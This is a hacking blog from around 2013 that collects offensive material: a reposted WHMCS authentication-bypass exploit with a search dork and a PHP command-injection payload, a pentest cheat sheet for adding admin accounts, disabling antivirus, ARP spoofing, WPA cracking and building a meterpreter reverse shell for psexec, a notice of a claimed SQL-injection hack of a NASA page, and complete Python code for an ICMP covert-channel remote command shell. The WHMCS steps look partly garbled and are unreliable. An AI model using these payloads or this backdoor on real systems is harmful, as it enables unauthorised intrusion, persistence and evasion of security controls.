Jan 5, 2013

Interesting link of packetstormsecurity.com today[2013-01-05]

Indrajith Mini Shell 2.0
http://packetstormsecurity.com/files/119233/Indrajith-Mini-Shell-2.0.html

WordPress BulletProof Security Cross Site Scripting
http://packetstormsecurity.com/files/112618/wpbulletproof-xss.txt

pfSense 2.0.1 XSS / CSRF / Command Execution
http://packetstormsecurity.com/files/119256/pfSense-2.0.1-XSS-CSRF-Command-Execution.html

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 4, 2013

WHMCS 5.x versions suffers from a cookie-validation vulnerability

WHMCS 5.x versions suffers from a cookie-validation vulnerability, where sessions can be modified and authentication can
be easily bypassed.

##################################################
# Description : WHMCS 5.x Authentication Bypass Vulnerability
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 5.x
# Link : http://www.whmcs.com/order-now/
# Date : Monday, December 31, 2012
# Dork : intext:Powered by WHMCompleteSolution
##################################################

Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.

# The Fact:

WHMCS
5.0 is completely vulnerable to this vulenrability, but in 5.1 version,
WHMCS has added extra cache-security, so I've added an extra-payload
for it, you can do the exploitation-process without the payload in the
5.0 version.


# The Exploitation

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

after
you have successfully entered that into your browser, the page will lag
for abit due to the cache-validation, which we, ofcourse, will change
it. ;-)


when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to
this:

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redirect={admin_index}";


# The Result

Once
you have done this process, you will be automatically be redirected to
the admin page, although, if the administrator has enabled
cache-security, this process will fail.

# Solution & Fix

No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.



Source: http://cxsecurity.com/issue/WLB-2013010026

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Cheat Sheet For Pentest By AverageSecurityGuy

Mount Shares

# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

# Mount Windows Share on Linux
mount -t cifs //server/share -o username=,password= /mnt/point

Add Administrative Accounts

# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

stdapi_sys_process_execute: Operation failed: 1314

# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

Metasploit: Use custom executable with psexec

# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter 
# session open in multi/handler

Disable Antivirus

# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic

ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK

# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

Create an IP List with Nmap

nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules

for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} 
-w:<wordlist> <password_file> ; done 
 
Source: http://averagesecurityguy.info/cheat-sheet/ 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

smbexec - A rapid psexec style attack with samba tools

If you want to download it, please go to the Source.

       smbexec
 A rapid psexec style attack with samba tools
      Original Concept and Script by PureHate & Brav0Hax
              Codename - Diamond in the Rough
             Gonna pha-q up - PurpleTeam Smash!

Source: https://github.com/brav0hax/smbexec 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

NASA HACKED BY D35M0ND142..

If you want to see all of leaked information, please go to the Source.
 
::::::::::::::::::::::::::::HACKED BY D35m0nd142:::::::::::::::::::::::::::::::::::::
 
Target: http://science.gsfc.nasa.gov/
IP Address: 129.164.179.160
HTTP Server: WebServer/1.0
Vulnerability: Blind SQL Injection + WAF Bypass
Author: D35m0nd142
 
 
//                 //
 
Page that has vulnerability:: http://science.gsfc.nasa.gov/sed/calendar/showevent.cfm?CalID=1319
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 2, 2013

Example Code Of Covert Channel Server & Client

These python codes are covert channel of ICMP that I created by myself, try it :) Happy New Year 2013

Server
#!/usr/bin/python

import os, sys, socket, struct, select, time , threading ,re

def checksum(payload):
    sum = 0
    countTo = (len(payload)/2)*2
    count = 0
    while count<countTo:
        thisVal = ord(payload[count + 1])*256 + ord(payload[count])
        sum = sum + thisVal
        sum = sum & 0xffffffff
        count = count + 2

    if countTo<len(payload):
        sum = sum + ord(payload[len(payload) - 1])
        sum = sum & 0xffffffff

    sum = (sum >> 16)  +  (sum & 0xffff)
    sum = sum + (sum >> 16)
    answer = ~sum
    answer = answer & 0xffff
    # Swap bytes.
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer

def response_icmp(dest_addr, timeout,payload):
    ### Specific ICMP Packet
    covert_icmp = socket.getprotobyname("icmp")
    try:
        client = socket.socket(socket.AF_INET, socket.SOCK_RAW, covert_icmp)
    except socket.error, (errno, msg):
        if errno == 1:
                   print socket.error(msg)
    process = os.getpid() & 0xFFFF
   
    ### Send Ping Packet
    dest_addr  =  socket.gethostbyname(dest_addr)
    data = "Covert:"+payload
    print "[%s]" % data
    my_checksum = 0
    ICMP_ECHO_REQUEST = 8

    #### pack for calculate checksum
    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, process, 1)
       
    my_checksum = checksum(header + data)

    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), process, 1)
    packet = header + data
    client.sendto(packet, (dest_addr, 1))

    client.close()
    #### return timeout

def main():
    delay=1
    check=1
    try:
        server = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        server.bind(("0.0.0.0", 0))
        server.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        print "Binding All Interfaces in Progress..."
    except:
        print "Cannot binding"

    last_message=False
    while 1:
        if check%2==0:
                  receive_message = server.recvfrom(65565)
                  buff = str(receive_message[0])
                  extract = re.search('Covert:(.*)', buff)
              if extract is not None:
                      command = extract.group(0)
              #### Command from Client
              cmd = command[7:]
                  #### print "%s"% cmd
            #### Extract Client IP to send ICMP back
              client_string_ip = receive_message[1]
              buff = str(client_string_ip)
                  client_ip = buff[2:-5]
              #### Show command that send from client
                  console = os.popen(cmd)
           
            #### for line in console.readlines():
            for index, line in enumerate(console):
                response_icmp(client_ip,delay,line)
                last_message=True
           
            if last_message==True:
                response_icmp(client_ip,delay,"end of shell")
                last_message=False

        check = check + 1

    server.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
    exit(0)

if __name__ == '__main__':
    main()


Client
#!/usr/bin/python

import socket, re, thread, os, sys, struct, select, time , threading
from threading import *

def checksum(payload):
    sum = 0
    countTo = (len(payload)/2)*2
    count = 0
    while count<countTo:
        thisVal = ord(payload[count + 1])*256 + ord(payload[count])
        sum = sum + thisVal
        sum = sum & 0xffffffff
        count = count + 2

    if countTo<len(payload):
        sum = sum + ord(payload[len(payload) - 1])
        sum = sum & 0xffffffff

    sum = (sum >> 16)  +  (sum & 0xffff)
    sum = sum + (sum >> 16)
    answer = ~sum
    answer = answer & 0xffff
    # Swap bytes.
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer

def receive_icmp(my_socket, ID, timeout):   
    while 1:
        recPacket, addr = my_socket.recvfrom(65565)
        payload = recPacket[28:1000]
        command = payload[7:1000]
        if command =="end of shell":
            break
        print (command)


def response_icmp(dest_addr, timeout,command):
    ### Specific ICMP Packet
    covert_icmp = socket.getprotobyname("icmp")
    try:
        client = socket.socket(socket.AF_INET, socket.SOCK_RAW, covert_icmp)
    except socket.error, (errno, msg):
        if errno == 1:
                   print socket.error(msg)
    process = os.getpid() & 0xFFFF
   
    ### Send Ping Packet
    dest_addr  =  socket.gethostbyname(dest_addr)
    data = "Covert:"+command
    my_checksum = 0
    ICMP_ECHO_REQUEST = 8

    #### pack for calculate checksum
    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, process, 1)
       
    my_checksum = checksum(header + data)

    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), process, 1)
    packet = header + data
    client.sendto(packet, (dest_addr, 1))
    receive_icmp(client,process,1)
    client.close()
    #### return timeout

def main():
    ip = raw_input("Enter the Server IP: ")
    delay = 1
    while 1:
        command = raw_input("# ")
        if command == "quit" or command == "exit":
            break
        else:
            print("Executing Command....\n")
            response_icmp(ip,delay,command)

if __name__ == '__main__':
    main() 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 30, 2012

Chrome Extensions for Pentest

One of the best chrome extension that can See the geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information of every IP address (IPv4 and IPv6). Including shortcut to Your public IP Address. It can use for whois, network lookup, spam database lookup and more.


It is a extension that will help in the process of penetration testing, you can easily log, edit and send HTTP request. Request Maker only captures requests sent via HTML forms and XMLHttpRequests; it doesn't fill the log with useless information about images and style sheets.

If you dont want to share your information on the Internet than not sharing my info is a best extension for you, use this extension to substitute it with an anonymous alias. It can replace your real email address with fake email address and so on.


Simply the best, after information gathering scanning and enumeration is the second phase of ethical hacking process, so this extension will really help you to scan open ports just like nmap.

I think there is no need to discuss the importance of proxy and anonymity in the field of hacking. Hide My Ass! operates the most popular browser based web proxy online, this is our official extension that enables you to easily redirect your web traffic through our anonymous proxy network.

There are different coolies editor available on firefox, just like firefox we have Edit this cookie on chrome that can help you to edit any cookie, add any cookie, block cookies, delete all the cookies and many more.


XSS is a bug on a web application that allows an attacker to inject their code, if you are doing a penetration testing on a web application than XSS rays will help you to perform the test effective and efficient. It's core features include a XSS scanner, XSS Reverser and object inspection.


If you want to keep update your self with the latest exploits, shell code and white papers than this exploit DB extension will help you.


Right-click on any link and scan the target with VirusTotal, free and easy. It gives a feature of online virus scanner amazing extension.  

Source: http://www.ehacking.net/2011/07/chrome-extensions-for-security.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |